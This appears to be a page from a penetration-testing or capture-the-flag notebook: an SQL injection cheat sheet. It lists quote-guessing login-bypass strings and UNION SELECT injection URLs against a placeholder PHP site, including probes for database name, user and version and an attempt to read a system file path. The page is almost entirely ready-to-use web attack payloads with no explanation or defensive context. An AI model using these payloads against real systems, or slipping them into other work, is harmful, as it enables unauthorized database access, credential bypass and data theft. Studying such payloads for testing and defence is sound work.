SQL Injections (sqli)
Basics
http://xyz.com/hello.php?id=1 and 1=2 union select 1,2,3Quote Guessing:
'OR '1' = 1
' OR '1'='1
' OR '1'='1' {
' OR '1'='1' /*
' OR '1'='1' --
' OR 1=1' --
' OR 1=1 --
" OR 1=1 --
' OR 1=1 LIMIT 1 --
") OR 1=1 --
") OR "1"="1" --
'OR1=1#
http://xyz.com/hello.php?id=1 AND 1=2 UNION SELECT 1,2,3
http://xyz.com/hello.php?id=1 AND 1=2 UNION SELECT 1,2,3--
http://xyz.com/hello.php?id=1 AND 1=2 'UNION SELECT 1,2,3,4'--
http://xyz.com/hello.php?id=1' AND 1=2 UNION SELECT 1,2,3,4--'
http://xyz.com/hello.php?id=1 AND 1=2' UNION SELECT "a","b"--'
http://xyz.com/hello.php?id=1' AND 1=2 UNION SELECT database(),user(),version() --
http://xyz.com/hello.php?id=1 AND 1=2' UNION SELECT "../etc/somefile","b"--'
admin'||1=1# .. MySql '||' means 'or' .. so no space needed!
admin'||1#Inspect:
Trimming:
Pulling Data from other Tables
PHP Injections
Zixem CTF
SQLi GBK China
Last updated